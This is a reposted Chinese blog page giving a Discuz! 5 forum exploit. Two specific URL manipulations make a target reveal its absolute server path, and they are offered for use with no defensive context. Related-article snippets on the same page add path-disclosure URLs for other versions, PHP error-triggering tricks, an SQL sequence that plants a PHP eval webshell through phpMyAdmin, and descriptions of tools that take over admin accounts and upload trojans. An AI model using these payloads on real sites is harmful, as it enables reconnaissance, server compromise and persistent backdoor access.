DIscuz5暴路径漏洞利用方法

最新推荐文章于 2021-12-28 18:28:10 发布

转载最新推荐文章于 2021-12-28 18:28:10 发布 · 2.1k 阅读

0 ·

CC 4.0 BY-SA版权

原文链接：http://www.cnblogs.com/allyesno/archive/2007/05/21/754084.html

文章标签：

#php

本文介绍DISCUZ5中存在的暴库漏洞利用方式，通过特定URL参数即可暴露数据库绝对路径。一种方法是在URL后添加特定字符串，另一种方法是访问特定文件。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

漏洞描述：DISCUZ5 暴库漏洞
在url后+&extra%5B%5D=page%3D1#pid1453，即可以暴出目标地址的绝对路径

另外一个：
在url后加wap/include/search.inc.php 也可以暴库！

转载于:https://www.cnblogs.com/allyesno/archive/2007/05/21/754084.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30404405

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

%5C暴库原理

Post Due To Vacuity

07-24

4145

暴库有两个方法，第一个就是利用%5c，另外一个conn.asp暴库。而且这里的暴库是针对access数据库的，而和access搭配的脚本一般是asp，因此出现暴库的一般为asp类型站点。 ASP是动态服务器页面（Active Server Pages）的英文缩写，后来也称为经典ASP，是微软公司开发的代替CGI脚本程序的一种应用，也是微软公司的第一个服务器侧的脚本引擎，能够动态产生Web

Discuz论坛爆物理路径原理

[智能天空教程区 Smart-sky]

01-24

1899

受影响版本Discuz!5.2Discuz!5.1Discuz!4.1Discuz!4.0.............1.common.inc.php问题代码207行 .....$navtitle = $navigation = ;$extra = isset($extra) && preg_match("/^+$/i", $extra) ? $extra : ;$tpp

参与评论您还未登录，请先登录后发表或查看评论

discuz漏洞汇总

热门推荐

hacker0ne的博客

05-05

5万+

Discuz漏洞拿服务器路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...

Discuz5安全漏洞

weixin_34110749的博客

05-14

265

topicadmin.php文件中的下面代码中，一看就是$accessadd1、$accessadd2这两个变量没有初始化。有可能引发SQL注射***。但实际我也没有时间和精力去测试。毕竟如果可以利用的话，要有一定权限哦。有兴趣的朋友可以自己看看。 if($adminid == 3) {if($accessmasks) {$accessadd1 = ', a.allowvi...

dz 论坛x2.5爆路径利用

l460602540的专栏

09-12

1649

http://blog.sina.com.cn/s/blog_4ab77dfb01015xro.html 注:转载请注明出处 Lind0ws 's Blog http://localhost/uc_server/control/admin/db.php http://localhost/source/plugin/myrepeats/table/table_myr

Discuz论坛远程漏洞利用方法详解

由于文件名称列表中并未提供具体的技术细节或漏洞利用的描述，以上内容是基于标题和描述所隐含的知识点进行的推测和扩展。实际的漏洞执行实例可能会涉及具体的技术细节和操作步骤，但这些不在提供的信息范围内。

discuz 任意管理员密码漏洞利用工具 vbs代码

09-05

在这个特定的情况下，我们讨论的是一个针对 Discuz 管理员密码的漏洞利用工具，该工具是用 VBScript (Visual Basic Script) 编写的。VBScript 是一种轻量级的脚本语言，常用于 Windows 环境中的自动化任务和网页交互...

政政Discuz!NT 2.5.0 漏洞利用工具 1

02-11

NT 2.5.0 漏洞利用工具 1.0 程序帮助： 1、先检测该论坛是否存在此漏洞 2、注册一个普通的帐号，提权成为管理员 3、更新ASPX为可上传，主要是为了上传ASPX木马的 4、去发表一个帖子，把你的ASPX木马上传上去。 5...

Discuz X 系列全版本后台Sql注入漏洞

bulangman277的博客

12-28

3834

Discuz! X 系列全版本后台Sql注入漏洞

Discuz! 6.0-7.0后台Webshell漏洞利用教程

论坛软件不同版本（如2011年及其之前，包括6.0和7.0）的后台获取Webshell漏洞利用技术。Discuz!是一个流行的PHP论坛系统，其安全漏洞常常成为攻击者的目标。文章的核心焦点在于利用Discuz!扩展插件中的漏洞进行文件...

PHP爆绝对路径方法收集

jihaichen的博客

05-06

3391

PHP爆绝对路径方法收集1、单引号爆路径说明：直接在URL后面加单引号，要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 Eg:www.xxx.com/news.php?id=149' 2、错误参数值爆路径说明：将要提交的参数值改成错误值，比如-1。单引号被过滤时不妨试试。 Eg:www.xxx.com/researcharchive.php?id=-1 3、Google爆...

discuz！ML 3.x代码执行漏洞的利用笔记

边城浪子的博客

09-18

1472

服务器：windows 2003 攻击机：windows 10 搭建过程：下载discuz！ML 3.x源码链接：https://pan.baidu.com/s/1QFd8rdXn_Je6lOehSLTIWw 提取码：5ka0 step1:在windows 2003中安装phpstudy step2:将源码中upload中的文件上传至phpstudy的www目录中。 step3:打...

discuzX3.2 X3.4网站漏洞修复 SQL注入与请求伪造攻击利用与修复

网站安全专家

12-10

9864

2018年12月9日，国内某安全组织，对discuz X3.2 X3.4版本的漏洞进行了公开，这次漏洞影响范围较大，具体漏洞是discuz 的用户前段SQL注入与请求伪造漏洞，也俗称SSRF漏洞，漏洞产生的原因首先：php环境的版本大约PHP5.2，dizcuzX3.2 X3.4版本，服务器环境是windows 2008 2003 2012系统，linux centos不受此漏洞的影响。漏...

Discuz 5.x 6.x 7.x 前台SQL注入漏洞

aixuan9365的博客

06-02

468

来源：http://wooyun.jozxing.cc/static/bugs/wooyun-2014-071516.html 漏洞出现在/include/editpost.inc.php。 if($thread['special'] == 1 && ($alloweditpoll || $isorigauthor) && !empty($p...

网络安全实战之discuz上传漏洞利用

weixin_44255593的博客

02-16

7843

攻击思路：想要拿下一台主机A的权限： 1、了解一下这个服务器：端口，服务器版本，操作系统版本。找漏洞 2、拿到对A有一定权限的身仹。如果对方是一个WEB服务器，就利用对方网站应用程序的漏洞，上传webshell然后提权 3、传上去后，得到apache用户普通权限，再提权成root 概述：这突破在一个DZ X系列自带的转换工具里面。漏洞路径：utility / convert / data / config.inc.php 漏洞发生的原因是：config.inc.php这个文件在黑客通过post写入时，

DZ x2.5 爆路径漏洞

fengling132的专栏

08-23

931

测试exp: http://localhost/uc_server/control/admin/db.php http://localhost/source/plugin/myrepeats/table/table_myrepeats.php http://localhost/install/include/install_lang.php

phpmyadmin后台4种拿shell方法及php爆路径收集

weixin_30367873的博客

08-31

1268

php后台拿shell要知道php的路径，文章下将讲诉爆php路径的方法！！！方法一： CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SE...

OutLookBar

weixin_30404405的博客

02-23

转自:http://www.codeproject.com/KB/selection/csoutlookbar.aspx /Files/johnwonder/CSOutlookBar_src.zip 转载于:https://www.cnblogs.com/johnwonder/archive/2010/02/23/1671992.html

一个老博士的2015年终总结（一） -- 偶然发现自己竟然在博客园发过帖子

weixin_30404405的博客

07-12

182

今年五月份刚刚结束博士答辩，带着爱人出去玩了一圈算是弥补一下一直亏欠她的结婚蜜月旅行，然后就匆匆忙忙办理各种回国的事宜，退大学公寓，处理银行支票本，递交归国留学人员证明的申请，好在六月初一切都办妥了，买好机票踏上回国的旅途。很感谢那天前来送我们的杰哥和鹏鹏，小克虽然中国学生很少，但一个实验室里的几位华人师兄弟还是很有情谊的，也许以后他们几个当中肯定能出个教授甚至老总什么的，毕竟都是有才华还勤勤恳恳...